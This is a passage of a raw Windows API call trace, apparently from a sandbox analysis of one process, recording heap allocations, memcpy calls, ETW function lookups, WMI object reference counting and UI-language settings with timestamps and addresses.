BaseAddress=0x562550) returned 1 [0290.989] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x527fe0 [0290.990] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x562430 [0290.990] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x527fe0) returned 1 [0290.990] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2c) returned 0x551ff0 [0290.990] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562430) returned 1 [0290.990] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc8) returned 0x545f30 [0290.991] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x545f30) returned 1 [0290.991] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x64) returned 0x547930 [0290.992] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x547930) returned 1 [0290.992] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xb0) returned 0x559ef0 [0290.992] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x551ff0) returned 1 [0290.993] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x559ef0) returned 1 [0290.996] memcpy (in: _Dst=0x122ded8, _Src=0x565141, _Size=0x4 | out: _Dst=0x122ded8) returned 0x122ded8 [0290.996] memcpy (in: _Dst=0x122ded8, _Src=0x564a4e, _Size=0x4 | out: _Dst=0x122ded8) returned 0x122ded8 [0290.997] memcpy (in: _Dst=0x122ded8, _Src=0x564a52, _Size=0x2 | out: _Dst=0x122ded8) returned 0x122ded8 [0290.997] memcpy (in: _Dst=0x122ded8, _Src=0x564a54, _Size=0x2 | out: _Dst=0x122ded8) returned 0x122ded8 [0290.997] memcpy (in: _Dst=0x122ded8, _Src=0x564a56, _Size=0x2 | out: _Dst=0x122ded8) returned 0x122ded8 [0291.029] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e1e0) returned 1 [0291.030] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x528010) returned 1 [0291.030] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569f60) returned 1 [0291.031] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e1e0) returned 1 [0291.031] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5280c0) returned 1 [0291.032] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569fc0) returned 1 [0291.033] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e1e0) returned 1 [0291.033] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x527fa0) returned 1 [0291.033] memcpy (in: _Dst=0x122de58, _Src=0x56a2ce, _Size=0x2 | out: _Dst=0x122de58) returned 0x122de58 [0291.033] memcpy (in: _Dst=0x122de58, _Src=0x56a2d0, _Size=0x2 | out: _Dst=0x122de58) returned 0x122de58 [0291.034] memcpy (in: _Dst=0x122de58, _Src=0x56a2d2, _Size=0x2 | out: _Dst=0x122de58) returned 0x122de58 [0291.034] memcpy (in: _Dst=0x122de58, _Src=0x56a2d4, _Size=0x2 | out: _Dst=0x122de58) returned 0x122de58 [0291.034] memcpy (in: _Dst=0x122de58, _Src=0x56d6d3, _Size=0x4 | out: _Dst=0x122de58) returned 0x122de58 [0291.034] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56ce30) returned 1 [0291.036] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56da40) returned 1 [0291.036] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56cb80) returned 1 [0291.036] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56a510) returned 1 [0291.036] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568f70) returned 1 [0291.036] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569370) returned 1 [0291.036] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568db0) returned 1 [0291.037] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x552030) returned 1 [0291.037] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x565650) returned 1 [0291.037] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562430) returned 1 [0291.037] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555a50) returned 1 [0291.038] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562590) returned 1 [0291.038] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555d20) returned 1 [0291.038] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x551930) returned 1 [0291.038] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x547770) returned 1 [0291.038] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x551930) returned 1 [0291.038] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x547770) returned 1 [0291.039] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5508b0) returned 1 [0291.039] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55ec50) returned 1 [0291.039] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5508b0) returned 1 [0291.039] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e9b0) returned 1 [0291.040] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5508b0) returned 1 [0291.040] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x547770) returned 1 [0291.040] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5508b0) returned 1 [0291.040] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x547850) returned 1 [0291.174] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56e630) returned 1 [0291.182] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56dff0) returned 1 [0291.182] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569e40) returned 1 [0291.183] GetModuleHandleW (lpModuleName="ntdll") returned 0x7fffcca30000 [0291.183] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwEventRegister") returned 0x7fffcca3a1c0 [0291.183] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwEventUnregister") returned 0x7fffcca7a450 [0291.183] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwEventWrite") returned 0x7fffcca79270 [0291.183] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwEventActivityIdControl") returned 0x7fffcca8bbc0 [0291.184] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwEventWriteTransfer") returned 0x7fffcca792b0 [0291.184] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwEventEnabled") returned 0x7fffcca7ad20 [0291.184] EtwEventRegister () returned 0x0 [0291.184] EtwEventWrite () returned 0x0 [0291.187] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () [0291.352] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568d50) returned 1 [0291.353] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x5660d0 [0291.353] memcpy (in: _Dst=0x5660d0, _Src=0x55d8f0, _Size=0x40 | out: _Dst=0x5660d0) returned 0x5660d0 [0291.355] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568eb0) returned 1 [0291.360] RtlRestoreLastWin32Error () returned 0x382000 [0291.360] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x122df80 | out: pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x122df80) returned 1 [0291.360] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x528040 [0291.360] RtlRestoreLastWin32Error () returned 0x382000 [0291.360] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x528040, pcchLanguagesBuffer=0x122df80 | out: pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x528040, pcchLanguagesBuffer=0x122df80) returned 1 [0291.360] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x5280d0 [0291.360] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x528040) returned 1 [0291.360] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x57c380 [0291.360] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x57c380, pulNumLanguages=0x122e098 | out: pulNumLanguages=0x122e098) returned 1 [0291.361] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c380) returned 1 [0291.362] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x5668f0 [0291.362] memcpy (in: _Dst=0x5668f0, _Src=0x565a70, _Size=0x40 | out: _Dst=0x5668f0) returned 0x5668f0 [0291.365] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569150) returned 1 [0291.366] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c4d0) returned 1 [0291.366] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c3b0) returned 1 [0291.379] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568d50) returned 1 [0291.384] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c4d0) returned 1 [0291.384] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569150) returned 1 [0291.384] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x58dc20) returned 1 [0291.384] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x58bfb0) returned 1 [0291.389] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x57c3b0 [0291.389] SafeArrayGetElemsize (psa=0x54b530) returned 0x8 [0291.389] memcpy (in: _Dst=0x122d850, _Src=0x122d780, _Size=0x8 | out: _Dst=0x122d850) returned 0x122d850 [0291.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c3b0) returned 1 [0291.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x561640) returned 1 [0291.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568df0) returned 1 [0291.391] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4) returned 0x5280e0 [0291.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c410) returned 1 [0291.399] RtlRestoreLastWin32Error () returned 0x382000 [0291.399] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0x122d8fc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x122d780 | out: pulNumLanguages=0x122d8fc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x122d780) returned 1 [0291.399] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x568df0 [0291.399] RtlRestoreLastWin32Error () returned 0x382000 [0291.399] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0x122d8fc, pwszLanguagesBuffer=0x568df0, pcchLanguagesBuffer=0x122d780 | out: pulNumLanguages=0x122d8fc, pwszLanguagesBuffer=0x568df0, pcchLanguagesBuffer=0x122d780) returned 1 [0291.400] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x568ef0 [0291.400] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0291.400] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409 [0291.400] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568df0) returned 1 [0291.406] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0291.406] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568f10) returned 1 [0291.406] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568ef0) returned 1 [0291.406] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c440) returned 1 [0291.406] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5280e0) returned 1 [0291.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c3b0) returned 1 [0291.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568df0) returned 1 [0291.441] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x582c00) returned 1 [0291.625] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b8ae0) returned 1 [0291.652] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b9260) returned 1 [0291.659] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x2 [0291.660] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x3 [0291.661] ?Release@CWbemObject@@UEAAKXZ () returned 0x1 [0291.662] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5c7080) returned 1 [0291.662] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bd610) returned 1 [0292.275] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bdf80) returned 1 [0292.303] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b9480) returned 1 [0292.303] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x2 [0292.304] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x3 [0292.305] ?Release@CWbemObject@@UEAAKXZ () returned 0x1 [0292.306] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5d7b40) returned 1 [0292.306] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bc7f0) returned 1 [0292.306] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bd610) returned 1 [0292.387] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b9480) returned 1 [0292.387] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x582f70) returned 1 [0292.387] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5280c0) returned 1 [0292.387] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c320) returned 1 [0292.387] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54b060) returned 1 [0292.387] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x545cf0) returned 1 [0292.388] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568120) returned 1 [0292.388] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c620) returned 1 [0292.388] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57bed0) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c2c0) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c3e0) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c650) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57bf90) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c4a0) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c290) returned 1 [0292.389] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c200) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c5f0) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c1d0) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c230) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57bf30) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c5c0) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c260) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c350) returned 1 [0292.390] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c590) returned 1 [0292.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c080) returned 1 [0292.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5668f0) returned 1 [0292.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x565a30) returned 1 [0292.391] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4) returned 0x5b49b0 [0292.391] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x5b49b0, pulNumLanguages=0x122e160 | out: pulNumLanguages=0x122e160) returned 1 [0292.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b49b0) returned 1 [0292.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5280d0) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56cee0) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e180) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e330) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dd90) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e210) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dc40) returned 1 [0292.392] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55de20) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55df40) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55de80) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dee0) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e000) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540600) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540480) returned 1 [0292.393] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540630) returned 1 [0292.394] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540660) returned 1 [0292.394] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550910) returned 1 [0292.394] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5509a0) returned 1 [0292.394] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57c1a0) returned 1 [0292.395] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5660d0) returned 1 [0292.395] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55d8b0) returned 1 [0292.395] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57dc70) returned 1 [0292.395] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x56e770) returned 1 [0292.396] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x576030) returned 1 [0292.396] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b1c80) returned 1 [0292.396] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x576100) returned 1 [0347.052] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b9040) returned 1 [0347.053] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x5b6ad0 [0347.053] memcpy (in: _Dst=0x5b6ad0, _Src=0x55d8f0, _Size=0x40 | out: _Dst=0x5b6ad0) returned 0x5b6ad0 [0347.055] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b9260) returned 1 [0347.057] RtlRestoreLastWin32Error () returned 0x382000 [0347.057] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x122df80 | out: pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x122df80) returned 1 [0347.057] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x5b4710 [0347.057] RtlRestoreLastWin32Error () returned 0x382000 [0347.057] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x5b4710, pcchLanguagesBuffer=0x122df80 | out: pulNumLanguages=0x122e098, pwszLanguagesBuffer=0x5b4710, pcchLanguagesBuffer=0x122df80) returned 1 [0347.057] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x5b4980 [0347.057] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b4710) returned 1 [0347.057] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5ad050 [0347.057] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x5ad050, pulNumLanguages=0x122e098 | out: pulNumLanguages=0x122e098) returned 1 [0347.058] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ad050) returned 1 [0347.059] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x5b88d0 [0347.060] memcpy (in: _Dst=0x5b88d0, _Src=0x5d8f30, _Size=0x40 | out: _Dst=0x5b88d0) returned 0x5b88d0 [0347.062] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b8dc0) returned 1 [0347.063] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5accf0) returned 1 [0347.063] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ad110) returned 1 [0347.066] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x5aca50 [0347.066] SafeArrayGetElemsize (psa=0x5b6320) returned 0x8 [0347.066] memcpy (in: _Dst=0x122d850, _Src=0x122d780, _Size=0x8 | out: _Dst=0x122d850) returned 0x122d850 [0347.067] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5aca50) returned 1 [0347.067] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x59e7c0) returned 1 [0347.070] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x582f30) returned 1 [0347.071] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x581750) returned 1 [0347.130] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b4240) returned 1 [0347.130] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x2 [0347.131] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x3 [0347.131] ?Release@CWbemObject@@UEAAKXZ () returned 0x1 [0347.133] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5a8de0) returned 1 [0347.133] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b3ed0) returned 1 [0347.133] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5be390) returned 1 [0347.382] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b4240) returned 1 [0347.407] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5be2f0) returned 1 [0347.407] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x2 [0347.408] ?AddRef@CWbemObject@@UEAAKXZ () returned 0x3 [0347.409] ?Release@CWbemObject@@UEAAKXZ () returned 0x1 [0347.409] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x58d330) returned 1 [0347.409] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bdf80) returned 1 [0347.409] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b9480) returned 1 [0347.459] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5be2f0) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bc7f0) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b49f0) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ad140) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b6990) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x546a70) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x568a20) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac6f0) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ace10) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac660) returned 1 [0347.460] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac8d0) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ad0e0) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acf30) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac9c0) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ace40) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ad170) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acab0) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acf90) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acb70) returned 1 [0347.461] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acc60) returned 1 [0347.462] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acc90) returned 1 [0347.462] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ace70) returned 1 [0347.462] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acea0) returned 1 [0347.462] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac9f0) returned 1 [0347.462] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5accc0) returned 1 [0347.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b88d0) returned 1 [0347.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5d8ef0) returned 1 [0347.463] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4) returned 0x5b47a0 [0347.463] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x5b47a0, pulNumLanguages=0x122e160 | out: pulNumLanguages=0x122e160) returned 1 [0347.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b47a0) returned 1 [0347.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b4980) returned 1 [0347.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acae0) returned 1 [0347.463] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac750) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acbd0) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acdb0) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac870) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac930) returned 